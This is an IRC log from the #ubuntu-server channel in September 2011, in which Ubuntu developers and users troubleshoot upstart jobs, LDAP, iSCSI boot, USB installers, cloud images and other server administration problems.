<kirkland> robbiew: we'll have 12.04 LTS in a couple of months
<kirkland> robbiew: and there are some other ways of going about doing it
<kirkland> robbiew: like ppa:orchestra/ppa
<kirkland> robbiew: but that's your team's call ;-)
<robbiew> kirkland: yeah...and a ppa is less "support" hassle
 * patdk-wk starts his ldap users at 100000, therefore skipping right over all known issues
<idlemind324> In the Setting up ACL portion of Ubuntu Server Guide (OpenLDAP) I am trying to run: ldapsearch -xLLL -b cn=config -D cn=admin,cn=config -W olcDatabase=hdb olcAccess it executes and asks me for my password but when i enter my admin ldap password it says authetnication failed
<idlemind324> any ideas?
<idlemind324> the interesting part is i don't remember any user named cn=admin,cn=config ever being added as part of the guide but i may be interpreting the -D incorrectly
 * Daviey read scrollback
<SpamapS> hallyn: I do have a plan to use the network-services upstart job to control these "en masse" .. the start on for libvirt-bin is a little tricky (and, I think, not doing what you might think it does) but it probably just needs to be 'start on runlevel [2345]'
<Daviey> robbiew: Yeah, i wouldn't like to SRU that.
<Daviey> Adding a PPA makes sense if people /really/ want it.
<SpamapS> As long as the PPA sees maintenance
<Daviey> SpamapS: I don't think it would need to be blessed as such, and the burden would probably be low.
<robbiew> yeah...I think that's best
<Daviey> As in, not enabled by default, or anything daft.
<SpamapS> No no no
<SpamapS> just that, don't create a PPA for one user's request, and then never upload again
<robbiew> yeah...just crack
<robbiew> better to just say "upgrade!"
<Daviey> feel the latest baby!
<robbiew> then have them curse us for any bugs they encounter
<memoryleak> Is there a programm to check how much RAM I can allocate from the VPS I'm using?
<Daviey> lifeless: You rock my world.
<melvincv> How may I start an app with Ubuntu server? Is it chkconfig command?
<melvincv> !chkconfig
<Daviey> melvincv: need more detail.
<patdk-wk> this isn't redhat/centos
<patdk-wk> update-rc.d
<melvincv> Alright, suppose I need to start the samba service along with Ubuntu server. What do I need to do to ensure that it runs on startup?
<Daviey> melvincv: it should start by default.
<melvincv> Is it the same with all other services like apache, dovecot, postfix, nis, etc.
<patdk-wk> normally, unless /etc/default/xxx says disabled
 * melvincv has come over here from RHEL 5 and wants to know if Ubuntu server is better than CentOS.
<Daviey> melvincv: If that is your primary benchmark, we are doing pretty well. :)
<melvincv> Great! So I'll get a test server running. But why doesn't 'service network restart' work? I need to learn new commands. :(
 * melvincv wonders if the guide in the channel topic is the best place to start?
<Daviey> $ sudo /etc/init.d/networking restart
 * melvincv wonders, "Yes, but why the extra typing???"
<hallyn> SpamapS: sounds good, thx
<melvincv> Well, long commands for a better server OS is actually a good bet.
<SpamapS> Daviey: is that *actually* what we're recommending?
<SpamapS> that seems.. very broken
<SpamapS> We might want to think about renaming /etc/init/networking.conf .. it causes too much confusion
<RoAkSoAx> Daviey: almost there for the demo
<Daviey> SpamapS: That is how i do all my non-upstart jobs.
<Daviey> Well, even some which are upstart i still do that :./
<Daviey> sudo reboot, will also restart your networking :)
<SpamapS> Daviey: we should be suggesting the use of the service command.
<SpamapS> but even then..
<SpamapS> service networking restart does the wrong thing. :-P
 * melvincv thinks that's weird...
<melvincv> Maybe I should file a bug?
 * melvincv is checking out Getting Involved.
<tumbleweed> anyone know who runs https://imagestor.canonical.com/ ? it appears that libcurl doesn't like it's cert
<tumbleweed> *its
<tumbleweed> *imagestore
<patdk-wk> did you tell curl where the cert store is?
<tumbleweed> oh I've given it the right CA cert
<tumbleweed> it's not validating it
<tumbleweed> openssl has no problem with it
<patdk-wk> tumbleweed, ya, I can't get openssl to verify it, looks like it's not passing the intermediant certs
<tumbleweed> yeah, but if you give curl the intermediate cert, that doesn't help. I'm getting the feeling gnutls doesnt' like wildcard certs
<patdk-wk> doubt that is it
<patdk-wk> how do I test with gnutls?
<tumbleweed> patdk-wk: gnutls-cli
<tumbleweed> no idea why gnutls doesn't like it
<tumbleweed> "Fatal error: Error in the certificate"
<patdk-wk> works for me, atleast with other wildcard certs
<tumbleweed> yup
<patdk-wk> but both gnutls and openssl have issues iwth that one
<tumbleweed> from what I can tell, gnutls is far stricter about the intermediate certificate chain than openssl is (give openssl the certificate that signed this one, as a CA certifacet, and it's happy)
<ersi> Maybe it's issued by a retard CA who has gotten it's trust revoked
<tumbleweed> which really comes back to why I came in here. Anyone know who runs that service, it's clearly got a problematic configuration
<patdk-wk> ersi, nope
<patdk-wk> looks like that root is not trusted by ubuntu at all, but is via firefox
<SpamapS> utlemming: ping re upload to oneiric...
<SpamapS> utlemming: start on runlevel [2345] and local-filesystems and net-device-up IFACE!=lo
<SpamapS> this is redundant in oneiric
<SpamapS> runlevel 2 happens only after all interfaces in /etc/network/interfaces are up
<SpamapS> zul: ^^
<SpamapS> it also breaks runlevel 1
<zul> dang it
<utlemming> SpamapS: interesting...okay, redoing
<SpamapS> local-filesystems, btw, *ALWAYS* happens before runlevel 2 , even going back to karmic
<utlemming> SpamapS: https://bugs.launchpad.net/ubuntu/+source/squid/+bug/831628
<uvirtbot> Launchpad bug 831628 in squid "squid upstart script doesn't check for filesystems" [Low,Fix committed]
<SpamapS> Ahh, I'd have marked that Invalid. :) runlevel 2 happens after all automatic fsck's... so whatever he's seeing is more than a little surprising
<SpamapS> I do actually think it needs to be just 'runlevel [2345]
<SpamapS> hmm
<SpamapS> I recall now that the reason for the 'or net-device-up IFACE!=lo' was to catch interfaces that come up after runlevel 2...
<SpamapS> utlemming: so yeah, I think you can just do 'runlevel [2345]'
<utlemming> SpamapS: for my education, do you have a link to where that is documented?
<SpamapS> Heh.. http://upstart.ubuntu.com/cookbook/
<SpamapS> utlemming: upstart can be a mess. Trying to simplify it so we don't have to think so hard for each upstart job.
<zul> its like rocket science ;)
<SpamapS> Yeah, it should be more like making cheeseburgers. :)
<utlemming> as in "I can has cheezburgers"
<SpamapS> ohaaaaiii
<utlemming> SpamapS: how did the merge regress bug #561779? I was a good little boy and tested it. Also, I deleted the merge request -- so it didn't make it all the way.
<uvirtbot> Launchpad bug 561779 in squid "squid is not started on runlevel transition 1 -> 2" [Medium,Fix committed] https://launchpad.net/bugs/561779
<SpamapS> utlemming: because on transition from runlevel 1 -> 2 , local-filesystems won't be emitted.
<jetole> Hey guys. Does anyone know how I can force quit rmmod when I used the -w (wait option). I changed my mind on waiting for these modules but now rmmod won't respond to kill -9 (it's not even defunct) and I killed the parent process, bash, but now it's just been inherited by init
<jetole> ... it's currently in a uninteruptable sleep
<Daviey> smoser / utlemming: Does aufs not work in oneiric cloud images?
<smoser> i dont know why it would not. other than possibly module not being present in -virtual
<Daviey> smoser: seems that is the case
<Daviey> CONFIG_AUFS_FS=m .. hmm
<jetole> my question can be ignored. appearently a process in a uninteruptable sleep can't really be forced to quit. even kill -9 has no effect and no way around that other then rebooting. If the process changes it's state to not being in the sleep then it will receive the signal immediately and quit but while it's in that state it's untouchable
<Daviey> smoser: we also don't have an admin group?
 * jetole goos to the data center. bbiab
<smoser> Daviey, i dont know that i care too much about admin... its likely not a regression (unless it is of the live-build tools)
<smoser> if it is a regression, then we need it fixed.
<smoser> please open a bug on aufs against kernel
<Daviey> smoser: I just threw the question into -kernel.
<Daviey> smoser: I just used a tool which expected the admin group to exist.
<Daviey> Really, we should be mimicing the main flavour. :)
<Daviey> IMO
<GrueMaster> iscsi on arm is going to be a major headache.  I can get both target & initiator to work on arm, but I can't get iscsi-rootfs to work.  Not sure if iscsi is somehow corrupting initramfs.
<koolhead17> hi guys
<adam_g> GrueMaster: what are the symptoms?
<GrueMaster> Garbage output on serial console when loading initramfs.
<GrueMaster> sigh, now I'm fighting screen console output.
<smoser> Daviey, also bug 844166
<uvirtbot> Launchpad bug 844166 in ubuntu "no admin group in cloud-images" [High,Confirmed] https://launchpad.net/bugs/844166
<soren> jetole: Yeah, that's pretty much what "uninterruptible" means :)
<soren> jetole: "defunct" means a process has terminated, but its parent hasn't called wait() on it. Quite different things.
<smoser> and bug 844164
<uvirtbot> Launchpad bug 844164 in Ubuntu Oneiric "cloud-images: /etc/cloud/build.info is emtpy" [Undecided,Confirmed] https://launchpad.net/bugs/844164
<koolhead17> what/how will i proceed if i have some custom scripts initiated at first ubuntu deployment on laptop, like cloud-init ?
<soren> jetole: All resources pertaining to defunct processes have been released except for one final thing: Their exit code. The kernel can't delete the process from its process table until someone has bothered to check its exit code (By calling wait*()).
<Daviey> thanks smoser
<koolhead17> hey Daviey
<Daviey> hey koolhead17
<koolhead17> Daviey: i needed answer of this question :)
<Daviey> GrueMaster: you might be hitting bug 838809
<uvirtbot> Launchpad bug 838809 in Ubuntu Oneiric "authenticated and unauthenicated iscsi clients fails to complete boot" [High,Confirmed] https://launchpad.net/bugs/838809
<koolhead17> shall i request a blueprint :D
<Daviey> koolhead17: zul did do some work to get cloud-init working on normal hardware last cycle.
<Daviey> Don't know if it got anywhere.
<zul> hmmm?
<koolhead17> ooh ok. it will be cool to have in end option coming in ISO install saying paste custom script, like cobbler, cloud-init or amazon :D
<Daviey> zul: didn't you?
<Daviey> koolhead17: well there is a late_command you can preseed whilst still in the installer.
<koolhead17> Daviey: yeah am using that, i meant in general booting from ISO in hardware. if there is sumthing
<koolhead17> :)
<koolhead17> it will be really cool
<GrueMaster> Daviey: I don't think this applies to me.  What I am seeing is far different.  Actual garbage on the console when the kernel jumps into the initramfs.
<koolhead17> RoAkSoAx: hello
<Daviey> GrueMaster: ok
 * koolhead17 bows to robbiew
<Daviey> koolhead17: You could throw something into /etc/rc.local and make sure it's flushed
<koolhead17> aah, i did that only. :)
<koolhead17> Daviey: whom should i run after for the bug i filled :P
<Daviey> koolhead17: As i said, it really needs more debug info. :(
<Daviey> It needs enough information for someone to be able to reproduce it
<koolhead17> Daviey: i provided hardware detail and scenario as well :( and  syslog ceases after assigning the IP
<jetole> soren: Yeah I understand what a zombie process is. Uninteruptable sleep is not a zombie or defunct process though and it can consume RAM and when that sleep ends then it can continue to use other resources
 * jetole just got back from the data center
<koolhead17> with the big Success! :P
 * koolhead17 was inside there for past 2 days to get cobbler oneiric love working
<jetole> soren: uninteruptable sleep can be, for example, when the process makes a sys call and is waiting on input from the kernel, in this case the kernel is blocking signals
<magicblaze007> previously my apache wsgi apps were located in /var/www -- for some reason, now apache looks for one of those apps in /etc/apache2/htdocs -- any ideas how to fix this? I tried adding DocumentRoot in the virtualhost entry, but that doesnt help either
<soren> jetole: Yes, exactly.
<soren> jetole: And uninterruptible means exactly that: It cannot be interrupted (by, say, kill -9).
<RoAkSoAx> koolhead17: howdy!! (sorry was out for lunch)
<jetole> soren: take a process that calls a system function and the system function, the code withing the kernel itself is either waiting on something or processing something to complete the call. the process would be in uninteruptable sleep until the kernel / system function returns to it
<koolhead17> Daviey: i will make video of it now and post it somewhere. haha :D
<jetole> soren: well I understand that now but it's Linux. You never know who found a hack for what
<koolhead17> RoAkSoAx: long time. how have you been.
<Daviey> koolhead17: I mean, it needs a log showing failure.. or more debug info.
<jetole> soren: in case it was say tweaking something in /proc or who knows. When I asked I thought there may have been a work around and when I said you can ignore my question because I now understand the answer, then what I meant was you can ignore my question because I now understand the answer :P
<RoAkSoAx> koolhead17: pretty good, yourself?
<jetole> lol
<soren> jetole: I didn't see that until after I responded :)
<koolhead17> Daviey: but i left the machine for over 1 hr and notthing happens
<koolhead17> https://bugs.launchpad.net/ubuntu/+source/debian-installer/+bug/842509
<uvirtbot> Launchpad bug 842509 in debian-installer "debian-installer fails to proceed/ceases if preseed fails to assign IP  automatically." [Undecided,New]
<jetole> soren: heh. It's cool. I'm justing teasing
<koolhead17> i have added exact line the logfile leaves in syslong
<koolhead17> *syslog
<koolhead17> and yes i have passed "kopts" in my preseed file to listen to eth1
 * jetole is now looking into a open-iscsi bug in 8.10 and how to resolve. Appearently open-iscsi in 8.10 is two different versions of open-iscsi wraped into one package that leads to errors
<koolhead17> RoAkSoAx: fighting with custom partition via cobbler/preseed, all tricks been unsucessful
<Daviey> koolhead17: Did you try updating your cobbler iso pool to the latest daily ISO?
<RoAkSoAx> koolhead17: ah yeah, there are some limitations when doing so
<jetole> https://bugs.launchpad.net/ubuntu/+source/open-iscsi/+bug/289470 yay!
<uvirtbot> Launchpad bug 289470 in open-iscsi "open-iscsi user-space does not match kernel module version" [Critical,Fix released]
<RoAkSoAx> koolhead17: at least for no questions asked
<jetole> soren: it just so happens there is someone mentioned in this bug by the name of soren
<jetole> soren: don't suppose that's you?
<koolhead17> Daviey: i did not unfortunately. :(
<koolhead17> will get back to you after trying that
<soren> jetole: sorry, which bug?
<Daviey> koolhead17: Yeah, the kernel bumped - so it could be related to that
<jetole> soren: https://bugs.launchpad.net/ubuntu/+source/open-iscsi/+bug/289470 - open-iscsi: two versions compiled to one package as a downstream from a debian error
<uvirtbot> Launchpad bug 289470 in open-iscsi "open-iscsi user-space does not match kernel module version" [Critical,Fix released]
<koolhead17> Daviey: okey.no more troubling you until am done testing new ISO :)
<RoAkSoAx> koolhead17: but are you trying to achieve anything using cloud-init and orchestra?
<soren> jetole: Yup, that would be me.
<Daviey> koolhead17: cool!
<jetole> soren: well maybe you can save me sometime. so far I have read to where a resolution exists in a ppa. Should I go with that solution or should I continue reading to the end of the bug report?
<koolhead17> RoAkSoAx: nopes working on some automation in datcentre, no orchestra
<RoAkSoAx> koolhead17: oh ok
<soren> jetole: No idea. It's been almost three years. :)
<koolhead17> Daviey: i just loved the late command option in preseed, its been life saver for me. :D
<RoAkSoAx> koolhead17: in ensemble/orchestra we are doing a late_command to pass cloud-init meta-data
<koolhead17> i changed repo info/pushed interface static address and many more other stuff :D
<koolhead17> RoAkSoAx: i have not touched orchestra, i have worked on ensemble though
<Daviey> koolhead17: heh
<koolhead17> and am stuck in ensemble because of a stupid bug
<Daviey> :(
<koolhead17> RoAkSoAx: https://bugs.launchpad.net/ubuntu/+source/dbconfig-common/+bug/807038
<uvirtbot> Launchpad bug 807038 in dbconfig-common "dbconfig-common fails to preseed phpmyadmin on natty/lucid" [Medium,New]
<koolhead17> Daviey: am hoping to get the hostname bug issue fixed too in new image :)
<Daviey> koolhead17: sweet
 * koolhead17 wants to work/try out jenkins soon
<RoAkSoAx> koolhead17: orchestra is just a wrapper for cobbler where we integrate various stuff
<RoAkSoAx> koolhead17: so it is really cobbler when I'[m talkiing about preseeding cloud-init stuff
<koolhead17> RoAkSoAx: ooh. ok
<magicblaze007> on ubuntu, is the default directory for apache /etc/apache2/htdocs?
<popey> What is the best supported method of installing Ubuntu from a 64-bit ISO onto a machine that has no optical drive?
<koolhead17> magicblaze007: /var/www
<popey> bonus points if you dont mention PXE
<koolhead17> boot from usb :D
<popey> how do I get the iso on the usb?
<RoAkSoAx> popey: usb-creator
<magicblaze007> koolhead17: something is wrong with my config -- http://paste.pocoo.org/show/471977/ -- for some reason -- myserver.com/chat goes and looks up /etc/apache2/htdocs...any ideas why?
<popey> have you ever tested usb-creator with a server cd?
<koolhead17> popey: how will it differ?
<popey> usb creator is designed to make live cd usb images
<popey> not alternate d-i ones
<popey> AIUI
<koolhead17> will give it a try tomorrow then
 * popey tries it now
<magicblaze007> anyone can help me debug my httpd.conf file please? http://paste.pocoo.org/show/471977/
<popey> ..and the answer is no, it doesn't work
<Daviey> koolhead17: How are you getting on with bug 795481?
<uvirtbot> Launchpad bug 795481 in principia "Formula needed: phpmyadmin" [Wishlist,In progress] https://launchpad.net/bugs/795481
<popey> you get dropped to a boot: prompt with a vesamenu.c32: not a Com32R image error.
<Daviey> Hmm, it worked in Natty.
<koolhead17> Daviey: https://bugs.launchpad.net/ubuntu/+source/dbconfig-common/+bug/807038
<uvirtbot> Launchpad bug 807038 in dbconfig-common "dbconfig-common fails to preseed phpmyadmin on natty/lucid" [Medium,New]
<koolhead17> stopped me from going there
<koolhead17> and i moved on to cobbler :(
<koolhead17> automation stuff
<Daviey> RoAkSoAx: Have you tried creating usb sticks recently?
<Daviey> (being related to testdrive, and all)
<RoAkSoAx> Daviey: like couple weeks ago
<RoAkSoAx> Daviey: what's wrong?
<popey> unetbootin makes a usb stick that fails to find the CD ROM during install.
<popey> usb creator fails with a boot: prompt
<Daviey> popey: unetbootin is a PoS last time i tried it.
 * popey tries dd
<koolhead17> unetbootin is cool. i use that only
<popey> for server CDs?
<koolhead17> popey: for any ISO IMHO. So give it a try :)
<popey> I did. As I said, it fails.
<T3CHKOMMIE> hey guys, im having a kernel emergecny, can anyone help me figure out why my custom kernal is panicing when it tryes to mount the VFS /dev/sda1?
<Daviey> Annoyingly i don't have a spare usb pendrive to hand, thanks to dendrobates :/
<Daviey> T3CHKOMMIE: It sounds like the bug is "custom kernel"
<Daviey> popey: Are you using usb-creator on natty or oneiric?
<T3CHKOMMIE> Daviey, im not fan of this, but my insturctors apparently dont know what they are doing and ive read all the instructions, i think i just dont concetpually understand what is going on. i loads the kernal, trys to boot then panics when it tries to mount the vfs
<Daviey> T3CHKOMMIE: Why are you using a custom kernel?
<T3CHKOMMIE> Daviey, its a dumb class requirment.
<T3CHKOMMIE> the require us to do this shit on modern oses with 3 year old lab instructions.... and when shit breaks they say "google it"
<T3CHKOMMIE> so ive been here for 5 horus and cant get the GD thing to boot :@
<popey> Daviey: oneiric
<Daviey> popey: ah!
<GrueMaster> T3CHKOMMIE: Sounds like it cant find initrd.
<Daviey> popey: I suspect it's a bug in that. :(
<T3CHKOMMIE> well, looks like with 10.4 i have to compile this orginally with some extra scripts.
<T3CHKOMMIE> F word.
 * popey reboot into natty and will test all three methods again
<T3CHKOMMIE> GrueMaster, do you know of a way for me to get this kernel working on 10.04? if that is the problem?
<Daviey> popey: cool, thanks
<GrueMaster> T3CHKOMMIE: Not really.  I don't do custom kernel stuff.  But you should be able to boot to a standard kernel and rebuild the initramfs.
<GrueMaster> Use "sudo update-initramfs -k <kernel>"
<T3CHKOMMIE> awesome let me give that a shot.
<T3CHKOMMIE> GrueMaster, if the kernel is already compiled is there a way to do this without recompiling?
<GrueMaster> if the kernel & modules are installed (make install) then update-initramfs should build an initrd.
<T3CHKOMMIE> ok, seems like im still having the problem, should i have something like initramfs=/dev/sda1 in the 40_custom file?
<GrueMaster> Huh?  I don't even follow what you are trying to accomplish here.  what is your boot cmdline?  You should have grub (or other boot loader) loading initramfs=/boot/initrd.img or something like that.
<GrueMaster> Look at a running system to get a better understanding.
<Daviey> popey: how is it looking?
<GrueMaster> Daviey: Here is the console output from booting my panda with iscsi rootfs.  http://paste.ubuntu.com/684686/  The only difference I can think of is that I added iscsi to /etc/initramfs-tools/modules and ran update-initramfs -u per http://etherboot.org/wiki/sanboot/ubuntu_iscsi
<popey> dding Daviey
<Daviey> popey: I don't have confidence that dd will work.. i think it will fail to find something early on during the installer.
<Daviey> popey: did natty fail?
<Daviey> GrueMaster: The kernel is on the sd?
<GrueMaster> yes
<Daviey> GrueMaster: do you have it connected to a network?
<GrueMaster> Obviously.
<popey> Daviey: dding to a partition
<GrueMaster> Get beyond the basics, please.  I have been doing netinstalls on these systems since A2.
<Daviey> GrueMaster: Can you try pinging?  I wonder if when the root fs comes up it is dropping the serial console.
<popey> Daviey: which also fails
<GrueMaster> No net.
<GrueMaster> It isn't getting that far.
<Daviey> GrueMaster: I'm trying to help here.  If you are going to be like that, it can wait until tomorrow.
<popey> Daviey: trying usb creator
<popey> and dbus errors in usb-creator
<Daviey> popey: in natty?
<popey> yes
<Daviey> Gah
<GrueMaster> Daviey: Sorry, but I have been doing system QA for the better part of 20 years, and I tend to get touchy when someone asks me noob questions (like "did you plug it in?")
<Daviey> GrueMaster: TBH, my brain wasn't in gear.. If i had thought about it, i'd have realised that it must be connected for iscsi.  It was really a pre-question to see if you could ping it, confirming if it was still booting ok - and the serial console had just gone AWOL.
<GrueMaster> Fair enough.  :P
<popey> Daviey: formatted and trying usb creator
<GrueMaster> From what it looks like, something in the initramfs is getting corrupted.
<GrueMaster> The same system booted just fine to USB prior to updating the initramfs.
<GrueMaster> That's why I find it so odd.
<Daviey> GrueMaster: do you have a pastebin of a loca filesystem boot?  I don't want to set mine up at the moment.
<Daviey> local*
<GrueMaster> Sure, give me a sec.
<Daviey> GrueMaster: hold fire, i have one
<Daviey> GrueMaster: So.. http://pb.daviey.com/JOuM/
<Daviey> GrueMaster: you get crap, where you should get - [ 2.430053] console [ttyO2] enabled
<popey> Daviey: fails on natty too, usb creator that is
<Daviey> Now i suspect it's a baud mismatch or something
<popey> this is why I asked initially what the supported way was
<Daviey> popey: The supported way is using usb-creator. :/
<popey> hah
 * popey keeps trying
<Daviey> Would someone be able to reproduce using usb-creator-gtk to create a server pendrive, and check you can get to the installer.. Seems to be broken for popey, and it would be nice if it could be reproduced.
<Daviey> kkthnx
<popey> gonna try the netinst image
<Daviey> mini.iso?
<jetole> soren: ah thanks. Sorry for the long delay but got called into a meeting
<Daviey> GrueMaster: Your /etc/init/ttyO2.conf settings are correct?
<GrueMaster> Yes.  Verified.
<Daviey> GrueMaster: So i have seen that crap on the output when i put wrong speed settings.. but if you are using the same settings as you normally use, i can't see how it could be that
<GrueMaster> Ok, I checked something else, and apparently my SD had some corruption.  Now getting further.
<GrueMaster> Yet another bug, it would seem.
<Daviey> gah
<GrueMaster> So now I appear to be stuck at the bug you mentioned earlier.
<Daviey> GrueMaster: Does text input make more rubbish show on the console?
<GrueMaster> Not after zeroing & reimaging the SD.
<Daviey> GrueMaster: Ah!  You are getting good text now?
<Daviey> and seeing bug 838809 ?
<uvirtbot> Launchpad bug 838809 in Ubuntu Oneiric "authenticated and unauthenicated iscsi clients fails to complete boot" [High,Confirmed] https://launchpad.net/bugs/838809
<GrueMaster> Yes.  The initrd was indeed corrupt, but due to SD.
<GrueMaster> I think so.  It just spewed a bunch of ext4 transport errors.
<GrueMaster> But it has mounted the iscsi volume and is running through init.
<Daviey> GrueMaster: hurray!
<Daviey> I'd never have considered the SD being bad :/
<GrueMaster> Well, until I see login, I am not calling this a full success.
<GrueMaster> Yea.  The SD issue I have seen from time to time, but usually when reflashing daily images on it. These particular systems have dedicated SD cards that don't get reflashed, just reformatted.
<Daviey> GrueMaster: ah
<popey> Daviey: bug 645818
<uvirtbot> Launchpad bug 645818 in usb-creator "Unknown keyword in configuration file: gfxboot" [Medium,Triaged] https://launchpad.net/bugs/645818
<Daviey> popey: that is weird.. i know i used usb pendrives for server during the natty cycle.. :/
<koolhead17> so popey was right?
<uvirtbot> New bug: #829064 in glance "glance/common/utils.py creates dangerous "execute" function that uses the shell to run commands without filtering meta characters" [Low,Fix committed] https://launchpad.net/bugs/829064
<Daviey> uvirtbot: did you see some issues we were seeing with the cloud images?
<uvirtbot> Daviey: Error: "did" is not a valid command.
<Daviey> err, utlemming
<utlemming> Daviey: pong
<utlemming> Daviey: the couple of issues -- admin user missing and build.info missing -- have been fixed
<utlemming> Daviey: I'm finalizing the testing now
<Daviey> utlemming: rocking!
<utlemming> Daviey: you're in luck -- fixes confirmed. Tonights builds should have those included...unless you want them sooner. I could have new images ETA 4hours
<Daviey> utlemming: i hope to be asleep by then :)
<utlemming> Daviey: lol
<Daviey> utlemming: what is the plan to diff the output of the old toolscheme to lb?
<utlemming> Daviey: incdiently I was working on the image diff tool earlier today. I'll have an initial pass completed in a couple hours
<utlemming> Daviey: I'm going to do side-by-side builds of old versus new for the next week and gets diffs on it.
<Daviey> utlemming: cool!
<talntid> had a full HDD.... deleted 9.1GB of logs, but it's still showing full.. any way to update without rebooting?
<patdk-lap> it will still show as full, untill the files are closed
<patdk-lap> sounds like those log files are still open by some program
<talntid> hmm... I see...
<talntid> lsof should be able to take care of that, right?
<patdk-lap> I believe so
<RyanP> It's quite possibly syslog keeping the space.
<talntid> did a lsof | grep log, saw a lot of rsyslog entries with (file deleted) at the end.. figured, cool.. killed the rsyslogd process, still no space...
<talntid> rsyslogd auto restarted, and no longer says deleted...
<Daviey> If anyone wants to look at security fixing http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=640028 that would be great! :)
<uvirtbot> Debian bug 640028 in bcfg2-server "Unescaped shell command vulnerabilities" [Critical,Fixed]
<uvirtbot> New bug: #844336 in net-snmp (main) "snmpd launched before network is fully up" [Undecided,New] https://launchpad.net/bugs/844336
<koolhead17> Daviey: thanks for updating the bug and assigning it to debain bug. :D
<JRWR> On Ubuntu 11.04, Running OpenLDP and Apache2 using SVN/WebDav setup, In Firefox, I can auth fine to the server (LDAP Authz) in svn I can auth, but I cannot mount the WebDav as a drive in windows, It refuses to accept the login details, Site Config: http://paste.ubuntu.com/684801/ - Access.log http://paste.ubuntu.com/684802/ - error.log http://paste.ubuntu.com/684803/
<bcessa> can someone here point me into some docs about how to setup certificate-based SSH auth? thanks, I don't mean plain priv/pub keys
<jeeves_moss> what package has starutil in it?  I can't find it.
#ubuntu-server 2011-09-08
<twb> Where's UDS this year?  Some canonical dude just emailed me offering to pay for my travel and board.
<twb> Oh, it says in the subject: "Orlando"
<Pici> twb: florida again irc.
<Pici> er, iirc.
<Pici> Yes, there.
<twb> No way I'm going near .us
<IdleOne> twb: why not? free trip and all...
<twb> Well, it boils down to 1) I don't like Ubuntu; 2) I *really* don't like USA; and 3) I don't deal well with meatspace.
<jdstrand> twb: you're funny :P
<twb> jdstrand: do I need to wave https://secure.wikimedia.org/wikipedia/en/wiki/Unix_hater%27s_handbook under your nose?
<jdstrand> twb: apparently so. I've actually not read that
 * jdstrand adds to his todo
<jdstrand> I do recall coming across it in various places, but never actually read it
<IdleOne> twb: honest answer. I can appreciate that.
<twb> It says something like "we hate unix not out of ignorance, but out of experience.  Only people who deal with its idiocies every day can truly appreciate how horrible it is"
<jdstrand> heheh
<jdstrand> I definitely need to read it :)
<twb> "see Peter Norvigâs detailed argument that Python is Scheme with funky syntax."
<twb> No, esr, it isn't.  Case in point: call/cc and TCO.
<twb> (http://esr.ibiblio.org/?p=538, linked from the above wiki page)
<uvirtbot> New bug: #844478 in openldap (main) "apt upgrade exits on error with slapd_2.4.21-0ubuntu5.5_amd64.deb" [Undecided,New] https://launchpad.net/bugs/844478
<sticht> quit
<jamespage> morning
<kev009> any opinions on zenoss vs opsview for monitoring?
<twb> collectd
<Daviey> I like twb, he is suitably angry.
<twb> Daviey: (on reflection, I suppose kees' security work is mostly good.)
<koolhead11> hi all
<twb> Most other stuff just annoys me though
<twb> Early adoption of slapd cn=config databases, for example
<twb> And because I only see LTS releases, usually by the time something affects me, that's already been the way Ubuntu has done it for two years
<twb> Anyway, really going home now.
<Daviey> twb: This UDS is planning for the next LTS. :)
<twb> Daviey: yeah, but e.g. unity is already in
<Daviey> twb: Yeah, we did gamble with slapd.. Some like it, others hate it.
<Daviey> twb: Yeah, we are having unity on Server this time.
<Daviey> it looks pretty good in ascii.
<twb> I have end users
<twb> They have netbooting diskless workstations.  They are prisoners.  In a prison.
<twb> I'm not looking forward to retraining them to switch to unity.
<Daviey> heh
<Daviey> twb: I'm really not convinced it will be /that/ much pain.
<twb> Yeah, that might be a bad example
<twb> Or say having to make sure 3D is working because I can't just replace unity with metacity like I could with compiz
<Daviey> evolution -> thunderbird probably more painful.
<Daviey> But they don't /need/ to switch.
<twb> Daviey: btdt
<Daviey> twb: Ah, already use tbird?
<twb> And we are running ephy because sqlite3 was having problems with either NFS or prisoners just pulling the plug out rather than doing a "clean" shutdown
<twb> *sqlite3 under ff
<Daviey> twb: Well do sleep on your invite.. you are most welcome.
<twb> And then ephy/webkit has a problem with authenticated proxies, where it displays the proxy error and then the real page beneath it...
<twb> Not that I blame ubuntu for that
<rbasak> doesn't sqlite3 say in large letters not to use it with NFS
<twb> rbasak: yep
 * rbasak never liked NFS
<twb> rbasak: and ff hard-depends on using sqlite3 out the wazoo
<twb> the alternative was CIFS and I didn't want to deal with machine accounts
<twb> I did try kerberized nfsv4 but I ran out of time and money before it actually worked
<rbasak> I would either forward the screen or have a local disk
<rbasak> s/disk/ramdisk/ if you like
<Daviey> shame
<twb> I'd quite like to get kerberized SMB2 running in a homogeneous debian/ubuntu environment, but samba4 isn't ready and it's all too hard
<twb> rbasak: forwarding the screens isn't as scalable
<Daviey> twb: If/when you do do that, i'd love to read a write up of it. :)
<Daviey> twb: Have you tried LTSP?
<rbasak> twb: but basic stuff will work without immense pain
<twb> Unfortunately LTSP was still at 4.0 when I built the existing infrastructure, and we are still using it out of inertia
<twb> I have rolled out a couple of small LTSP5 and debian-live sites
<koolhead11> TeTeT: hello there
<TeTeT> hi koolhead11
<twb> rbasak: oh and I do run ff over the network here, because I won't allow anything that bloated on my own desktop, and that one line is struggle-central, because ff is so bad
<rbasak> in general, doing anything unusual results in pain, so unless it's central to what I'm doing, I don't do it
<Daviey> twb: You should do this, http://lwn.net/Articles/262570/
<twb> I do it deliberately so I can file snarky bug reports
<twb> Daviey: I know RMS' browsing habits
<twb> My main browse is emacs, tho
<Daviey> It is very efficient use of your time :)
<rbasak> Daviey: speaking of pain, qemu and fifos!
<rbasak> AFAICT, if there is a buffer it's not bigger than 8M
<rbasak> And not listening on the fifo will cause qemu to throw stuff away
<twb> Isn't buffering the kernel's problem?
<twb> like ulimit
<rbasak> (either that or it's hanging the system)
<rbasak> I think it's the former though
<twb> -q     The maximum number of bytes in POSIX message queues ?
<twb> I guess that's IPC not fifo
<twb> so ignore me
<Daviey> twb: other ideas for bug 832507, welcome
<uvirtbot> Daviey: Error: Could not parse data returned by Launchpad: HTTP Error 500: Internal Server Error
<Daviey> *sigh*
<twb> haha
<rbasak> Also it won't start the system unless there is a listener, but that's not too bad
<rbasak> I've found the code, it just tries a write(2) and if that fails it throws it away AFAICT
<twb> I get that too http://paste.debian.net/128809/
<Daviey> bug 832507
<uvirtbot> Launchpad bug 832507 in nova "console.log grows indefinitely" [High,In progress] https://launchpad.net/bugs/832507
<twb> rbasak: can't you just use udp ports or something?
<twb> Daviey: I call savelog in the init script's start job
<twb> At least, in the related lxc case
<twb> http://paste.debian.net/128810/
